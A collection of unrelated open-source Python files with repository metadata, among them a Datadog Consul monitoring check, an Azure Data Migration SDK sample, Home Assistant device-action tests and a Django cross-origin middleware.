    def delete_endpoint(self, endpoint_id):
        """DELETE /endpoints/{id}; return (response headers, response body)."""
        resp_header, resp_body = self.delete('endpoints/%s' % endpoint_id)
        return resp_header, resp_body
| {
"content_hash": "9cf92bd8c8224503f7c31056a300d821",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 79,
"avg_line_length": 39.44285714285714,
"alnum_prop": 0.5461789206809127,
"repo_name": "eltonkevani/tempest_el_env",
"id": "cf26d0a1e4aa5e096abb64d71dbc0c1c0c60425c",
"size": "3443",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tempest/services/identity/v3/json/endpoints_client.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1871339"
},
{
"name": "Shell",
"bytes": "5748"
}
],
"symlink_target": ""
} |
from collections import defaultdict
from datetime import datetime, timedelta
from itertools import islice
from math import ceil, floor, sqrt
from urlparse import urljoin
# project
from checks import AgentCheck
from utils.containers import hash_mutable
# 3p
import requests
# More information in https://www.consul.io/docs/internals/coordinates.html,
# code is based on the snippet there.
def distance(a, b):
    """Estimate the RTT in milliseconds between two Consul nodes from their
    network (Vivaldi) coordinates: Euclidean distance of the coordinate
    vectors plus both node heights, then both adjustments when the adjusted
    value stays positive."""
    coord_a = a['Coord']
    coord_b = b['Coord']
    sum_of_squares = 0
    for own, other in zip(coord_a['Vec'], coord_b['Vec']):
        delta = own - other
        sum_of_squares += delta * delta
    rtt = sqrt(sum_of_squares) + coord_a['Height'] + coord_b['Height']
    adjusted = rtt + coord_a['Adjustment'] + coord_b['Adjustment']
    if adjusted > 0.0:
        rtt = adjusted
    # Seconds -> milliseconds.
    return rtt * 1000.0
def ceili(v):
    """Round *v* up to the nearest integer and return it as an int."""
    rounded_up = ceil(v)
    return int(rounded_up)
class ConsulCheckInstanceState(object):
    """Mutable per-instance state kept between check runs."""
    def __init__(self):
        # Cached payload of /v1/agent/self (None until first fetch).
        self.local_config = None
        # When local_config was last fetched, for TTL-based refresh.
        self.last_config_fetch_time = None
        # Leader seen on the previous run, used to detect leader changes.
        self.last_known_leader = None
class ConsulCheck(AgentCheck):
    """Datadog agent check for Consul: leader election events, peer counts,
    and service/catalog health."""
    # Service-check names emitted by this check.
    CONSUL_CHECK = 'consul.up'
    HEALTH_CHECK = 'consul.check'
    CONSUL_CATALOG_CHECK = 'consul.catalog'
    SOURCE_TYPE_NAME = 'consul'
    MAX_CONFIG_TTL = 300 # seconds
    MAX_SERVICES = 50 # cap on distinct Consul ServiceIDs to interrogate
    # Map Consul health-state strings to Datadog service-check statuses.
    STATUS_SC = {
        'up': AgentCheck.OK,
        'passing': AgentCheck.OK,
        'warning': AgentCheck.WARNING,
        'critical': AgentCheck.CRITICAL,
    }
    # Ordering of statuses by severity (higher = worse).
    STATUS_SEVERITY = {
        AgentCheck.UNKNOWN: 0,
        AgentCheck.OK: 1,
        AgentCheck.WARNING: 2,
        AgentCheck.CRITICAL: 3,
    }
    def __init__(self, name, init_config, agentConfig, instances=None):
        """Initialize the check with a lazily-populated per-instance state map."""
        AgentCheck.__init__(self, name, init_config, agentConfig, instances)
        # One ConsulCheckInstanceState per distinct instance config
        # (keyed by hash_mutable(instance) in check()).
        self._instance_states = defaultdict(lambda: ConsulCheckInstanceState())
def consul_request(self, instance, endpoint):
url = urljoin(instance.get('url'), endpoint)
try:
clientcertfile = instance.get('client_cert_file', self.init_config.get('client_cert_file', False))
privatekeyfile = instance.get('private_key_file', self.init_config.get('private_key_file', False))
cabundlefile = instance.get('ca_bundle_file', self.init_config.get('ca_bundle_file', True))
acl_token = instance.get('acl_token', None)
headers = {}
if acl_token:
headers['X-Consul-Token'] = acl_token
if clientcertfile:
if privatekeyfile:
resp = requests.get(url, cert=(clientcertfile,privatekeyfile), verify=cabundlefile, headers=headers)
else:
resp = requests.get(url, cert=clientcertfile, verify=cabundlefile, headers=headers)
else:
resp = requests.get(url, verify=cabundlefile, headers=headers)
except requests.exceptions.Timeout:
self.log.exception('Consul request to {0} timed out'.format(url))
raise
resp.raise_for_status()
return resp.json()
### Consul Config Accessors
def _get_local_config(self, instance, instance_state):
if not instance_state.local_config or datetime.now() - instance_state.last_config_fetch_time > timedelta(seconds=self.MAX_CONFIG_TTL):
instance_state.local_config = self.consul_request(instance, '/v1/agent/self')
instance_state.last_config_fetch_time = datetime.now()
return instance_state.local_config
    def _get_cluster_leader(self, instance):
        """Return the current cluster leader as reported by /v1/status/leader
        (compared against the agent's "addr:port" elsewhere)."""
        return self.consul_request(instance, '/v1/status/leader')
def _get_agent_url(self, instance, instance_state):
self.log.debug("Starting _get_agent_url")
local_config = self._get_local_config(instance, instance_state)
agent_addr = local_config.get('Config', {}).get('AdvertiseAddr')
agent_port = local_config.get('Config', {}).get('Ports', {}).get('Server')
agent_url = "{0}:{1}".format(agent_addr, agent_port)
self.log.debug("Agent url is %s" % agent_url)
return agent_url
def _get_agent_datacenter(self, instance, instance_state):
local_config = self._get_local_config(instance, instance_state)
agent_dc = local_config.get('Config', {}).get('Datacenter')
return agent_dc
### Consul Leader Checks
def _is_instance_leader(self, instance, instance_state):
try:
agent_url = self._get_agent_url(instance, instance_state)
leader = instance_state.last_known_leader or self._get_cluster_leader(instance)
self.log.debug("Consul agent lives at %s . Consul Leader lives at %s" % (agent_url,leader))
return agent_url == leader
except Exception:
return False
    def _check_for_leader_change(self, instance, instance_state):
        """Detect leader changes and emit a 'consul.new_leader' event.

        Behavior is driven by two config flags: new_leader_checks (emit on any
        leader change) and self_leader_check (emit only when this agent becomes
        leader). With both unset this is a no-op; with both set,
        new_leader_checks is ignored.
        """
        perform_new_leader_checks = instance.get('new_leader_checks',
                                                 self.init_config.get('new_leader_checks', False))
        perform_self_leader_check = instance.get('self_leader_check',
                                                 self.init_config.get('self_leader_check', False))
        if perform_new_leader_checks and perform_self_leader_check:
            self.log.warn('Both perform_self_leader_check and perform_new_leader_checks are set, '
                          'ignoring perform_new_leader_checks')
        elif not perform_new_leader_checks and not perform_self_leader_check:
            # Nothing to do here
            return
        leader = self._get_cluster_leader(instance)
        if not leader:
            # A few things could be happening here.
            # 1. Consul Agent is Down
            # 2. The cluster is in the midst of a leader election
            # 3. The Datadog agent is not able to reach the Consul instance (network partition et al.)
            self.log.warn('Consul Leader information is not available!')
            return
        if not instance_state.last_known_leader:
            # We have no state preserved, store some and return
            instance_state.last_known_leader = leader
            return
        agent = self._get_agent_url(instance, instance_state)
        agent_dc = self._get_agent_datacenter(instance, instance_state)
        if leader != instance_state.last_known_leader:
            # There was a leadership change
            if perform_new_leader_checks or (perform_self_leader_check and agent == leader):
                # We either emit all leadership changes or emit when we become the leader and that just happened
                self.log.info(('Leader change from {0} to {1}. Sending new leader event').format(
                    instance_state.last_known_leader, leader))
                # NOTE(review): strftime("%s") is a non-portable glibc
                # extension (epoch seconds) — confirm target platforms.
                self.event({
                    "timestamp": int(datetime.now().strftime("%s")),
                    "event_type": "consul.new_leader",
                    "source_type_name": self.SOURCE_TYPE_NAME,
                    "msg_title": "New Consul Leader Elected in consul_datacenter:{0}".format(agent_dc),
                    "aggregation_key": "consul.new_leader",
                    "msg_text": "The Node at {0} is the new leader of the consul datacenter {1}".format(
                        leader,
                        agent_dc
                    ),
                    "tags": ["prev_consul_leader:{0}".format(instance_state.last_known_leader),
                             "curr_consul_leader:{0}".format(leader),
                             "consul_datacenter:{0}".format(agent_dc)]
                })
        # Remember the current leader for the next run.
        instance_state.last_known_leader = leader
### Consul Catalog Accessors
    def get_peers_in_cluster(self, instance):
        """Return the raft peer list from /v1/status/peers, or [] when the
        agent returns a falsy body."""
        return self.consul_request(instance, '/v1/status/peers') or []
    def get_services_in_cluster(self, instance):
        """Return the mapping of service names from /v1/catalog/services."""
        return self.consul_request(instance, '/v1/catalog/services')
def get_nodes_with_service(self, instance, service):
    """Return the health entries for every node that provides ``service``."""
    return self.consul_request(instance, '/v1/health/service/{0}'.format(service))
def _cull_services_list(self, services, service_whitelist, max_services=MAX_SERVICES):
    """Trim the polled service set down to at most ``max_services`` entries.

    When a whitelist is configured only whitelisted services are kept
    (truncated to ``max_services``); otherwise the first ``max_services``
    keys of the catalog mapping are used.
    """
    if service_whitelist:
        if len(service_whitelist) > max_services:
            self.warning('More than %d services in whitelist. Service list will be truncated.' % max_services)
        whitelisted = [s for s in services if s in service_whitelist]
        return whitelisted[:max_services]
    if len(services) <= max_services:
        self.log.debug('Consul service whitelist not defined. Agent will poll for all %d services found', len(services))
        return services
    self.warning('Consul service whitelist not defined. Agent will poll for at most %d services' % max_services)
    return list(islice(services.iterkeys(), 0, max_services))
def check(self, instance):
    """Run the Consul check for one instance.

    Always emits the ``consul.peers`` gauge and leader-change events; when
    this agent is the cluster leader it additionally emits service health
    checks, catalog metrics and (optionally) network latency metrics.
    """
    # Instance state is mutable, any changes to it will be reflected in self._instance_states
    instance_state = self._instance_states[hash_mutable(instance)]
    self._check_for_leader_change(instance, instance_state)
    peers = self.get_peers_in_cluster(instance)
    main_tags = []
    agent_dc = self._get_agent_datacenter(instance, instance_state)
    if agent_dc is not None:
        main_tags.append('consul_datacenter:{0}'.format(agent_dc))
    for tag in instance.get('tags', []):
        main_tags.append(tag)
    if not self._is_instance_leader(instance, instance_state):
        self.gauge("consul.peers", len(peers), tags=main_tags + ["mode:follower"])
        # NOTE(review): this concatenation produces "...leader.Skipping..."
        # with no separating space -- cosmetic log defect, left as-is here.
        self.log.debug("This consul agent is not the cluster leader." +
                       "Skipping service and catalog checks for this instance")
        return
    else:
        self.gauge("consul.peers", len(peers), tags=main_tags + ["mode:leader"])
    service_check_tags = ['consul_url:{0}'.format(instance.get('url'))]
    # Per-instance settings fall back to init_config defaults.
    perform_catalog_checks = instance.get('catalog_checks',
                                          self.init_config.get('catalog_checks'))
    perform_network_latency_checks = instance.get('network_latency_checks',
                                                  self.init_config.get('network_latency_checks'))
    try:
        # Make service checks from health checks for all services in catalog
        health_state = self.consul_request(instance, '/v1/health/state/any')
        sc = {}
        # Compute the highest status level (OK < WARNING < CRITICAL) a check
        # reaches among all the nodes it is running on.
        for check in health_state:
            # One service-check entry per (check, service id, service name) triple.
            sc_id = '{0}/{1}/{2}'.format(check['CheckID'], check.get('ServiceID', ''), check.get('ServiceName', ''))
            status = self.STATUS_SC.get(check['Status'])
            if status is None:
                status = AgentCheck.UNKNOWN
            if sc_id not in sc:
                tags = ["check:{0}".format(check["CheckID"])]
                if check["ServiceName"]:
                    tags.append("service:{0}".format(check["ServiceName"]))
                if check["ServiceID"]:
                    tags.append("consul_service_id:{0}".format(check["ServiceID"]))
                sc[sc_id] = {'status': status, 'tags': tags}
            elif self.STATUS_SEVERITY[status] > self.STATUS_SEVERITY[sc[sc_id]['status']]:
                # Keep only the most severe status seen for this check id.
                sc[sc_id]['status'] = status
        for s in sc.values():
            self.service_check(self.HEALTH_CHECK, s['status'], tags=main_tags+s['tags'])
    except Exception as e:
        # Any failure while talking to the health endpoint marks the Consul
        # service check critical for this URL.
        self.log.error(e)
        self.service_check(self.CONSUL_CHECK, AgentCheck.CRITICAL,
                           tags=service_check_tags)
    else:
        self.service_check(self.CONSUL_CHECK, AgentCheck.OK,
                           tags=service_check_tags)
    if perform_catalog_checks:
        # Collect node by service, and service by node counts for a whitelist of services
        services = self.get_services_in_cluster(instance)
        service_whitelist = instance.get('service_whitelist',
                                         self.init_config.get('service_whitelist', []))
        max_services = instance.get('max_services',
                                    self.init_config.get('max_services', self.MAX_SERVICES))
        services = self._cull_services_list(services, service_whitelist, max_services)
        # {node_id: {"up: 0, "passing": 0, "warning": 0, "critical": 0}
        nodes_to_service_status = defaultdict(lambda: defaultdict(int))
        for service in services:
            # For every service in the cluster,
            # Gauge the following:
            # `consul.catalog.nodes_up` : # of Nodes registered with that service
            # `consul.catalog.nodes_passing` : # of Nodes with service status `passing` from those registered
            # `consul.catalog.nodes_warning` : # of Nodes with service status `warning` from those registered
            # `consul.catalog.nodes_critical` : # of Nodes with service status `critical` from those registered
            service_tags = ['consul_service_id:{0}'.format(service)]
            nodes_with_service = self.get_nodes_with_service(instance, service)
            # {'up': 0, 'passing': 0, 'warning': 0, 'critical': 0}
            node_status = defaultdict(int)
            for node in nodes_with_service:
                # The node_id is n['Node']['Node']
                node_id = node.get('Node', {}).get("Node")
                # An additional service is registered on this node. Bump up the counter
                nodes_to_service_status[node_id]["up"] += 1
                # If there is no Check for the node then Consul and dd-agent consider it up
                if 'Checks' not in node:
                    node_status['passing'] += 1
                    node_status['up'] += 1
                else:
                    found_critical = False
                    found_warning = False
                    found_serf_health = False
                    for check in node['Checks']:
                        if check['CheckID'] == 'serfHealth':
                            found_serf_health = True
                            # For backwards compatibility, the "up" node_status is computed
                            # based on the total # of nodes 'running' as part of the service.
                            # If the serfHealth is `critical` it means the Consul agent isn't even responding,
                            # and we don't register the node as `up`
                            if check['Status'] != 'critical':
                                node_status["up"] += 1
                            continue
                        if check['Status'] == 'critical':
                            found_critical = True
                            break
                        elif check['Status'] == 'warning':
                            found_warning = True
                            # Keep looping in case there is a critical status
                    # Increment the counters based on what was found in Checks
                    # `critical` checks override `warning`s, and if neither are found, register the node as `passing`
                    if found_critical:
                        node_status['critical'] += 1
                        nodes_to_service_status[node_id]["critical"] += 1
                    elif found_warning:
                        node_status['warning'] += 1
                        nodes_to_service_status[node_id]["warning"] += 1
                    else:
                        if not found_serf_health:
                            # We have not found a serfHealth check for this node, which is unexpected
                            # If we get here assume this node's status is "up", since we register it as 'passing'
                            node_status['up'] += 1
                        node_status['passing'] += 1
                        nodes_to_service_status[node_id]["passing"] += 1
            for status_key in self.STATUS_SC:
                status_value = node_status[status_key]
                self.gauge(
                    '{0}.nodes_{1}'.format(self.CONSUL_CATALOG_CHECK, status_key),
                    status_value,
                    tags=main_tags+service_tags
                )
        for node, service_status in nodes_to_service_status.iteritems():
            # For every node discovered for whitelisted services, gauge the following:
            # `consul.catalog.services_up` : Total services registered on node
            # `consul.catalog.services_passing` : Total passing services on node
            # `consul.catalog.services_warning` : Total warning services on node
            # `consul.catalog.services_critical` : Total critical services on node
            node_tags = ['consul_node_id:{0}'.format(node)]
            self.gauge('{0}.services_up'.format(self.CONSUL_CATALOG_CHECK),
                       len(services),
                       tags=main_tags+node_tags)
            for status_key in self.STATUS_SC:
                status_value = service_status[status_key]
                self.gauge(
                    '{0}.services_{1}'.format(self.CONSUL_CATALOG_CHECK, status_key),
                    status_value,
                    tags=main_tags+node_tags
                )
    if perform_network_latency_checks:
        self.check_network_latency(instance, agent_dc, main_tags)
def _get_coord_datacenters(self, instance):
return self.consul_request(instance, '/v1/coordinate/datacenters')
def _get_coord_nodes(self, instance):
return self.consul_request(instance, 'v1/coordinate/nodes')
def check_network_latency(self, instance, agent_dc, main_tags):
    """Emit inter- and intra-datacenter latency gauges from Consul coordinates.

    Uses the module-level ``distance`` helper to estimate RTT between
    coordinate pairs; ``floor`` and ``ceili`` come from the module imports
    (not visible in this chunk) -- presumably math.floor and a ceil-to-int
    helper; verify against the file header.
    """
    datacenters = self._get_coord_datacenters(instance)
    for datacenter in datacenters:
        name = datacenter['Datacenter']
        if name == agent_dc:
            # This is us, time to collect inter-datacenter data
            for other in datacenters:
                other_name = other['Datacenter']
                if name == other_name:
                    # Ignore ourself
                    continue
                # All pairwise latencies between our nodes and theirs.
                latencies = []
                for node_a in datacenter['Coordinates']:
                    for node_b in other['Coordinates']:
                        latencies.append(distance(node_a, node_b))
                latencies.sort()
                tags = main_tags + ['source_datacenter:{}'.format(name),
                                    'dest_datacenter:{}'.format(other_name)]
                n = len(latencies)
                half_n = int(floor(n / 2))
                # Median of the sorted latencies (mean of middle two when even).
                if n % 2:
                    median = latencies[half_n]
                else:
                    median = (latencies[half_n - 1] + latencies[half_n]) / 2
                self.gauge('consul.net.dc.latency.min', latencies[0], hostname='', tags=tags)
                self.gauge('consul.net.dc.latency.median', median, hostname='', tags=tags)
                self.gauge('consul.net.dc.latency.max', latencies[-1], hostname='', tags=tags)
            # We've found ourself, we can move on
            break
    # Intra-datacenter
    nodes = self._get_coord_nodes(instance)
    if len(nodes) == 1:
        self.log.debug("Only 1 node in cluster, skipping network latency metrics.")
    else:
        for node in nodes:
            node_name = node['Node']
            # Latency from this node to every other node in the datacenter.
            latencies = []
            for other in nodes:
                other_name = other['Node']
                if node_name == other_name:
                    continue
                latencies.append(distance(node, other))
            latencies.sort()
            n = len(latencies)
            half_n = int(floor(n / 2))
            if n % 2:
                median = latencies[half_n]
            else:
                median = (latencies[half_n - 1] + latencies[half_n]) / 2
            # Percentiles are taken directly from the sorted list; metrics are
            # attributed to the node via hostname.
            self.gauge('consul.net.node.latency.min', latencies[0], hostname=node_name, tags=main_tags)
            self.gauge('consul.net.node.latency.p25', latencies[ceili(n * 0.25) - 1], hostname=node_name, tags=main_tags)
            self.gauge('consul.net.node.latency.median', median, hostname=node_name, tags=main_tags)
            self.gauge('consul.net.node.latency.p75', latencies[ceili(n * 0.75) - 1], hostname=node_name, tags=main_tags)
            self.gauge('consul.net.node.latency.p90', latencies[ceili(n * 0.90) - 1], hostname=node_name, tags=main_tags)
            self.gauge('consul.net.node.latency.p95', latencies[ceili(n * 0.95) - 1], hostname=node_name, tags=main_tags)
            self.gauge('consul.net.node.latency.p99', latencies[ceili(n * 0.99) - 1], hostname=node_name, tags=main_tags)
            self.gauge('consul.net.node.latency.max', latencies[-1], hostname=node_name, tags=main_tags)
| {
"content_hash": "b5f0e61b946e73cd07a55cc2929e2295",
"timestamp": "",
"source": "github",
"line_count": 463,
"max_line_length": 142,
"avg_line_length": 46.60259179265659,
"alnum_prop": 0.5514668396904111,
"repo_name": "itsuugo/integrations-core",
"id": "0207d75cea4ff7a29950179cea2677832d6ebd81",
"size": "21693",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "consul/check.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "2692"
},
{
"name": "Erlang",
"bytes": "15429"
},
{
"name": "Go",
"bytes": "1471"
},
{
"name": "Nginx",
"bytes": "1173"
},
{
"name": "PLSQL",
"bytes": "28501"
},
{
"name": "Perl",
"bytes": "5845"
},
{
"name": "Python",
"bytes": "1733132"
},
{
"name": "Ruby",
"bytes": "177186"
},
{
"name": "Shell",
"bytes": "11831"
}
],
"symlink_target": ""
} |
from azure.identity import DefaultAzureCredential
from azure.mgmt.datamigration import DataMigrationManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-datamigration
# USAGE
python tasks_update.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
    """Update the DMS SDK task's target connection info and print the result."""
    dms_client = DataMigrationManagementClient(
        credential=DefaultAzureCredential(),
        subscription_id="fc04246f-04c5-437e-ac5e-206a19e7193f",
    )
    # Payload for the ConnectToTarget.SqlDb task being updated.
    task_parameters = {
        "properties": {
            "input": {
                "targetConnectionInfo": {
                    "authentication": "SqlAuthentication",
                    "dataSource": "ssma-test-server.database.windows.net",
                    "encryptConnection": True,
                    "password": "testpassword",
                    "trustServerCertificate": True,
                    "type": "SqlConnectionInfo",
                    "userName": "testuser",
                }
            },
            "taskType": "ConnectToTarget.SqlDb",
        }
    }
    updated_task = dms_client.tasks.update(
        group_name="DmsSdkRg",
        service_name="DmsSdkService",
        project_name="DmsSdkProject",
        task_name="DmsSdkTask",
        parameters=task_parameters,
    )
    print(updated_task)
# x-ms-original-file: specification/datamigration/resource-manager/Microsoft.DataMigration/preview/2022-03-30-preview/examples/Tasks_Update.json
# Run the sample only when executed as a script (not on import).
if __name__ == "__main__":
    main()
| {
"content_hash": "7fc271a33d69481eb8393df169aaa9c5",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 144,
"avg_line_length": 35.568627450980394,
"alnum_prop": 0.6085997794928335,
"repo_name": "Azure/azure-sdk-for-python",
"id": "28d46d756d2b260d947b001f689e297d31e10a1c",
"size": "2282",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/datamigration/azure-mgmt-datamigration/generated_samples/tasks_update.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
"""The tests for NEW_NAME device actions."""
import pytest
from homeassistant.components import automation
from homeassistant.components.NEW_DOMAIN import DOMAIN
from homeassistant.core import HomeAssistant
from homeassistant.helpers import device_registry, entity_registry
from homeassistant.setup import async_setup_component
from tests.common import (
MockConfigEntry,
assert_lists_same,
async_get_device_automations,
async_mock_service,
mock_device_registry,
mock_registry,
)
@pytest.fixture
def device_reg(hass: HomeAssistant) -> device_registry.DeviceRegistry:
    """Provide an empty, loaded mock device registry bound to hass."""
    registry = mock_device_registry(hass)
    return registry
@pytest.fixture
def entity_reg(hass: HomeAssistant) -> entity_registry.EntityRegistry:
    """Provide an empty, loaded mock entity registry bound to hass."""
    registry = mock_registry(hass)
    return registry
async def test_get_actions(
    hass: HomeAssistant,
    device_reg: device_registry.DeviceRegistry,
    entity_reg: entity_registry.EntityRegistry,
) -> None:
    """Test we get the expected actions from a NEW_DOMAIN."""
    entry = MockConfigEntry(domain="test", data={})
    entry.add_to_hass(hass)
    device = device_reg.async_get_or_create(
        config_entry_id=entry.entry_id,
        connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
    )
    entity_reg.async_get_or_create(DOMAIN, "test", "5678", device_id=device.id)
    # Every NEW_DOMAIN entity is expected to expose exactly these two actions.
    expected_actions = [
        {
            "domain": DOMAIN,
            "type": action_type,
            "device_id": device.id,
            "entity_id": "NEW_DOMAIN.test_5678",
        }
        for action_type in ("turn_on", "turn_off")
    ]
    actions = await async_get_device_automations(hass, "action", device.id)
    assert_lists_same(actions, expected_actions)
async def test_action(hass: HomeAssistant) -> None:
    """Test for turn_on and turn_off actions."""

    def _automation(event_type, action_type):
        # One event-triggered automation invoking the given device action.
        return {
            "trigger": {
                "platform": "event",
                "event_type": event_type,
            },
            "action": {
                "domain": DOMAIN,
                "device_id": "abcdefgh",
                "entity_id": "NEW_DOMAIN.entity",
                "type": action_type,
            },
        }

    assert await async_setup_component(
        hass,
        automation.DOMAIN,
        {
            automation.DOMAIN: [
                _automation("test_event_turn_off", "turn_off"),
                _automation("test_event_turn_on", "turn_on"),
            ]
        },
    )
    turn_off_calls = async_mock_service(hass, "NEW_DOMAIN", "turn_off")
    turn_on_calls = async_mock_service(hass, "NEW_DOMAIN", "turn_on")

    # Firing the off-event must invoke only the turn_off action.
    hass.bus.async_fire("test_event_turn_off")
    await hass.async_block_till_done()
    assert len(turn_off_calls) == 1
    assert len(turn_on_calls) == 0

    # Firing the on-event must invoke only the turn_on action.
    hass.bus.async_fire("test_event_turn_on")
    await hass.async_block_till_done()
    assert len(turn_off_calls) == 1
    assert len(turn_on_calls) == 1
| {
"content_hash": "31e0d15d294b56be7fccd2d5423f7126",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 85,
"avg_line_length": 32.596330275229356,
"alnum_prop": 0.550520686743597,
"repo_name": "kennedyshead/home-assistant",
"id": "424fa0a9afd08ca281e3ee97f2504f20dc2c0f06",
"size": "3553",
"binary": false,
"copies": "8",
"ref": "refs/heads/dev",
"path": "script/scaffold/templates/device_action/tests/test_device_action.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "33970989"
},
{
"name": "Shell",
"bytes": "4900"
}
],
"symlink_target": ""
} |
from django import http
# Pull the CORS configuration from Django settings, falling back per-setting
# to permissive defaults. The previous `try/except AttributeError` discarded
# ALL configured values as soon as any single setting was missing; using
# getattr() keeps whichever settings are actually present.
from django.conf import settings

XS_SHARING_ALLOWED_ORIGINS = getattr(settings, 'XS_SHARING_ALLOWED_ORIGINS', '*')
XS_SHARING_ALLOWED_METHODS = getattr(
    settings, 'XS_SHARING_ALLOWED_METHODS', ['POST', 'GET', 'OPTIONS', 'PUT', 'DELETE'])
XS_SHARING_ALLOWED_HEADERS = getattr(
    settings, 'XS_SHARING_ALLOWED_HEADERS', ['Content-Type', '*'])
XS_SHARING_ALLOWED_CREDENTIALS = getattr(
    settings, 'XS_SHARING_ALLOWED_CREDENTIALS', 'true')
class XsSharing(object):
    """
    This middleware allows cross-domain XHR using the html5 postMessage API.
    Access-Control-Allow-Origin: http://foo.example
    Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
    Based off https://gist.github.com/426829
    """

    def _apply_cors_headers(self, response):
        # Stamp the shared CORS headers onto the given response and return it.
        response['Access-Control-Allow-Origin'] = XS_SHARING_ALLOWED_ORIGINS
        response['Access-Control-Allow-Methods'] = ",".join(XS_SHARING_ALLOWED_METHODS)
        response['Access-Control-Allow-Headers'] = ",".join(XS_SHARING_ALLOWED_HEADERS)
        response['Access-Control-Allow-Credentials'] = XS_SHARING_ALLOWED_CREDENTIALS
        return response

    def process_request(self, request):
        # Answer CORS preflight requests immediately with an empty response.
        if 'HTTP_ACCESS_CONTROL_REQUEST_METHOD' in request.META:
            return self._apply_cors_headers(http.HttpResponse())
        return None

    def process_response(self, request, response):
        # Every outgoing response carries the CORS headers.
        return self._apply_cors_headers(response)
"content_hash": "fe644a8cf07646afa88eb0ddcb82b65d",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 94,
"avg_line_length": 44.214285714285715,
"alnum_prop": 0.6882067851373183,
"repo_name": "ksiomelo/cubix",
"id": "77657be00729d733b0ccd73eaf5f2ea8db370a8b",
"size": "1857",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "middlewares/crossdomainxhr.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "42207"
},
{
"name": "HTML",
"bytes": "108713"
},
{
"name": "JavaScript",
"bytes": "1212584"
},
{
"name": "Python",
"bytes": "365304"
}
],
"symlink_target": ""
} |
import unittest
from bulbs.config import Config
from bulbs.tests import BulbsTestCase, bulbs_test_suite
from bulbs.neo4jserver import Graph, Neo4jClient, NEO4J_URI, \
VertexIndexProxy, EdgeIndexProxy, ExactIndex
from bulbs.tests import GremlinTestCase
# Wire the shared BulbsTestCase fixture to a local Neo4j server so the
# generic bulbs test suite exercises the Neo4j backend implementation.
config = Config(NEO4J_URI)
BulbsTestCase.client = Neo4jClient(config)
BulbsTestCase.vertex_index_proxy = VertexIndexProxy
BulbsTestCase.edge_index_proxy = EdgeIndexProxy
BulbsTestCase.index_class = ExactIndex
BulbsTestCase.graph = Graph(config)
def test_suite():
    """Assemble the Neo4j backend suite, appending the Gremlin test cases."""
    suite = bulbs_test_suite()
    # RestTestCase is intentionally excluded for now.
    # suite.addTest(unittest.makeSuite(RestTestCase))
    gremlin_cases = unittest.makeSuite(GremlinTestCase)
    suite.addTest(gremlin_cases)
    return suite
# Run the assembled suite when executed directly.
if __name__ == '__main__':
    unittest.main(defaultTest='test_suite')
| {
"content_hash": "583b9f465c1075654b9e57f36e85b797",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 62,
"avg_line_length": 32.56521739130435,
"alnum_prop": 0.7823765020026703,
"repo_name": "windj007/bulbs",
"id": "de7e017a71504e24dbb498347aeb76688e500675",
"size": "749",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "bulbs/neo4jserver/tests/bulbs_tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Groovy",
"bytes": "17880"
},
{
"name": "Makefile",
"bytes": "650"
},
{
"name": "Python",
"bytes": "350466"
}
],
"symlink_target": ""
} |
from common_fixtures import * # NOQA
def test_zone_list(admin_client, client):
    """The admin client sees at least one zone; a regular client's listing succeeds."""
    zones = admin_client.list_zone()
    assert len(zones) > 0
    zones = client.list_zone()
    # NOTE(review): `>= 0` is vacuously true -- this only verifies the call
    # returns a sized collection without raising for a non-admin client.
    assert len(zones) >= 0
| {
"content_hash": "f796d23eac87f367890b33e65a4397f3",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 41,
"avg_line_length": 22.666666666666668,
"alnum_prop": 0.6519607843137255,
"repo_name": "alena1108/cattle",
"id": "b404a2cc273173f7f5864ebce63ad4e2fb82ef80",
"size": "204",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/integration/cattletest/core/test_zone.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Java",
"bytes": "3287143"
},
{
"name": "Makefile",
"bytes": "6771"
},
{
"name": "Python",
"bytes": "193716"
},
{
"name": "Shell",
"bytes": "54068"
}
],
"symlink_target": ""
} |
from ...attrs import LIKE_NUM
# fmt: off
_num_words = [
    "zero", "one", "two", "three", "four", "five", "six", "seven", "eight",
    "nine", "ten", "eleven", "twelve", "thirteen", "fourteen", "fifteen",
    "sixteen", "seventeen", "eighteen", "nineteen", "twenty", "thirty", "forty",
    "fifty", "sixty", "seventy", "eighty", "ninety", "hundred", "thousand",
    "million", "billion", "trillion", "quadrillion", "gajillion", "bazillion"
]
